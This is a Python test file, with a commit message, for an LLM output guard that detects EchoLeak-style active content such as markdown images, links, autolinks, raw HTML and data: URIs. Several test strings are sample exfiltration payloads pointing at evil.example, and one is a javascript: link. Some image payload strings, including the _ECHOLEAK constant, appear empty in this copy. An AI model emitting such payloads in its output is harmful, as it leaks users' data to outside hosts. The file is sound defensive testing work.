Close the EchoLeak wiring hole (CVE-2025-32711 class): markdown images/ links, reference definitions, autolinks, raw active HTML and data: URIs now surface as report-only findings (active:*, OWASP LLM05) in scan_output step 6, so screen_output and okf.import_bundle dispose of them instead of admitting them with findings=[]. - new active_content.py: canonical home of the shared pattern table + scan_active_content; neutralize refactored to import it (mutating API and behavior unchanged, all neutralize tests pass as-is) - images/links flagged only for absolute/protocol-relative URLs: relative in-bundle links are legitimate wiki/OKF mechanism (principle 5) - evidence carries defanged URLs only (hxxps://evil[.]example) - EchoLeak vectors planted in both showcases; detach proofs cover them - README export list + checklist step 6, CLAUDE.md context line updated Suite: 321 -> 341 passed. Core invariant intact (dependencies=[]).
166 lines
6.7 KiB
Python
166 lines
6.7 KiB
Python
"""Tests for the report-only active-content detector (review 2026-07, Session A).
|
|
|
|
``scan_active_content`` closes the EchoLeak wiring hole (CVE-2025-32711): the
|
|
active-content classes ``neutralize`` can defang — markdown images/links,
|
|
reference-link definitions, angle-bracket autolinks, raw active HTML, ``data:``
|
|
URIs — must also surface as *findings* on the standard gate, so
|
|
``screen_output`` and ``okf.import_bundle`` dispose of them instead of admitting
|
|
them silently (OWASP LLM05 — Improper Output Handling).
|
|
|
|
Report-only twin of ``neutralize`` (design principles 3 & 4): it never mutates,
|
|
and severities mirror the defanger's (image / raw-html / data-uri HIGH, links
|
|
MEDIUM). One deliberate divergence: markdown images/links are flagged only when
|
|
the URL is absolute or protocol-relative — a relative in-document link carries
|
|
no exfiltration affordance, and flagging it would silently over-block legitimate
|
|
wiki content (design principle 5: over-blocking is a failure mode).
|
|
"""
|
|
from __future__ import annotations
|
|
|
|
from llm_ingestion_guard import (
|
|
scan_active_content,
|
|
scan_output,
|
|
screen_output,
|
|
Disposition,
|
|
PRESET_USER_UPLOAD,
|
|
)
|
|
from llm_ingestion_guard.okf import import_bundle, Origin, Channel
|
|
from llm_ingestion_guard.report import Severity, Source
|
|
|
|
# The zero-click EchoLeak primitive: an auto-fetched markdown image URL.
|
|
_ECHOLEAK = ""
|
|
|
|
|
|
# --- the wiring hole the review proved (Probe 1/1b/2) ------------------------
|
|
|
|
def test_markdown_image_is_reported():
|
|
report = scan_active_content(_ECHOLEAK)
|
|
img = [f for f in report.findings if f.label == "active:markdown-image"]
|
|
assert len(img) == 1
|
|
assert img[0].severity is Severity.HIGH
|
|
assert img[0].detector == "active_content"
|
|
assert img[0].owasp == "LLM05"
|
|
|
|
|
|
def test_scan_output_includes_active_content():
|
|
labels = {f.label for f in scan_output(_ECHOLEAK).findings}
|
|
assert "active:markdown-image" in labels
|
|
|
|
|
|
def test_screen_output_reports_echoleak():
|
|
# Review Probe 1: this was WARN with findings=[] — the unsafe admit.
|
|
decision = screen_output(_ECHOLEAK, PRESET_USER_UPLOAD)
|
|
assert decision.disposition is not Disposition.WARN, decision
|
|
|
|
|
|
def test_okf_import_flags_body_echoleak():
|
|
# Review Probe 2: the same payload in an OKF concept body was ADMITted.
|
|
bundle = {"note.md": "---\ntype: table\n---\n" + _ECHOLEAK + "\n"}
|
|
result = import_bundle(bundle, origin=Origin.EXTERNAL, channel=Channel.AUTOMATIC)
|
|
assert result.disposition is not Disposition.WARN, result
|
|
|
|
|
|
# --- each active-content class surfaces as a finding -------------------------
|
|
|
|
def test_inline_link_is_reported_medium():
|
|
report = scan_active_content("click [here](https://evil.example/go) now")
|
|
link = [f for f in report.findings if f.label == "active:markdown-link"]
|
|
assert len(link) == 1
|
|
assert link[0].severity is Severity.MEDIUM
|
|
|
|
|
|
def test_reference_link_definition_is_reported():
|
|
text = "See [the doc][ref].\n\n[ref]: https://evil.example/leak"
|
|
labels = {f.label for f in scan_active_content(text).findings}
|
|
assert "active:reference-link" in labels
|
|
|
|
|
|
def test_autolink_is_reported():
|
|
report = scan_active_content("read more <https://evil.example/x> here")
|
|
assert any(f.label == "active:autolink" for f in report.findings)
|
|
|
|
|
|
def test_raw_active_html_is_reported():
|
|
report = scan_active_content('<img src="https://evil.example/leak?d=x">')
|
|
html = [f for f in report.findings if f.label == "active:raw-html"]
|
|
assert len(html) == 1
|
|
assert html[0].severity is Severity.HIGH
|
|
|
|
|
|
def test_data_uri_is_reported():
|
|
report = scan_active_content("open data:text/html;base64,PHNjcmlwdD4= please")
|
|
data = [f for f in report.findings if f.label == "active:data-uri"]
|
|
assert len(data) == 1
|
|
assert data[0].severity is Severity.HIGH
|
|
|
|
|
|
# --- false-positive guards: no exfil affordance -> no finding ----------------
|
|
|
|
def test_relative_link_is_not_flagged():
|
|
# The OKF cross-link case: in-bundle links are the format's core mechanism.
|
|
report = scan_active_content("See [orders](/tables/orders.md) and [notes](./notes.md).")
|
|
assert report.found is False
|
|
|
|
|
|
def test_relative_image_is_not_flagged():
|
|
report = scan_active_content("")
|
|
assert report.found is False
|
|
|
|
|
|
def test_protocol_relative_url_is_flagged():
|
|
# `//evil.example` resolves against the rendering host's scheme — external.
|
|
report = scan_active_content("[x](//evil.example/leak)")
|
|
assert any(f.label == "active:markdown-link" for f in report.findings)
|
|
|
|
|
|
def test_dangerous_scheme_link_is_flagged():
|
|
report = scan_active_content("[x](javascript:alert(1))")
|
|
assert any(f.label == "active:markdown-link" for f in report.findings)
|
|
|
|
|
|
def test_clean_prose_has_no_findings():
|
|
text = ("A perfectly ordinary wiki paragraph. Costs $5! See section [1] below "
|
|
"(really). if a < b and c > d then see [note]. the metadata: field.")
|
|
assert scan_active_content(text).found is False
|
|
|
|
|
|
def test_benign_formatting_html_is_not_flagged():
|
|
report = scan_active_content("This is <b>strong</b> and <em>emph</em> text.")
|
|
assert report.found is False
|
|
|
|
|
|
# --- counting and evidence hygiene -------------------------------------------
|
|
|
|
def test_image_is_not_double_counted_as_link():
|
|
labels = {f.label for f in scan_active_content("").findings}
|
|
assert "active:markdown-image" in labels
|
|
assert "active:markdown-link" not in labels
|
|
|
|
|
|
def test_autolink_is_not_double_counted_as_html():
|
|
# `<https://...?src=x>` also parses as an HTML tag with a URL attribute; the
|
|
# autolink pass must consume it first (mirrors neutralize's pass order).
|
|
report = scan_active_content("<https://evil.example/leak?src=x>")
|
|
labels = [f.label for f in report.findings]
|
|
assert labels.count("active:autolink") == 1
|
|
assert "active:raw-html" not in labels
|
|
|
|
|
|
def test_multiple_images_are_counted():
|
|
report = scan_active_content(" ")
|
|
img = [f for f in report.findings if f.label == "active:markdown-image"][0]
|
|
assert img.count == 2
|
|
|
|
|
|
def test_evidence_never_carries_a_fetchable_url():
|
|
# Evidence is defanged (hxxps / bracketed dots): the report must be safe to
|
|
# log and render without recreating the auto-fetch affordance it flagged.
|
|
for payload in (_ECHOLEAK, '<img src="https://evil.example/leak?d=x">'):
|
|
for f in scan_active_content(payload).findings:
|
|
assert "https://" not in (f.evidence or ""), (f.label, f.evidence)
|
|
|
|
|
|
def test_default_source_is_output_and_override_respected():
|
|
assert all(f.source is Source.OUTPUT
|
|
for f in scan_active_content(_ECHOLEAK).findings)
|
|
assert all(f.source is Source.INPUT
|
|
for f in scan_active_content(_ECHOLEAK, source=Source.INPUT).findings)
|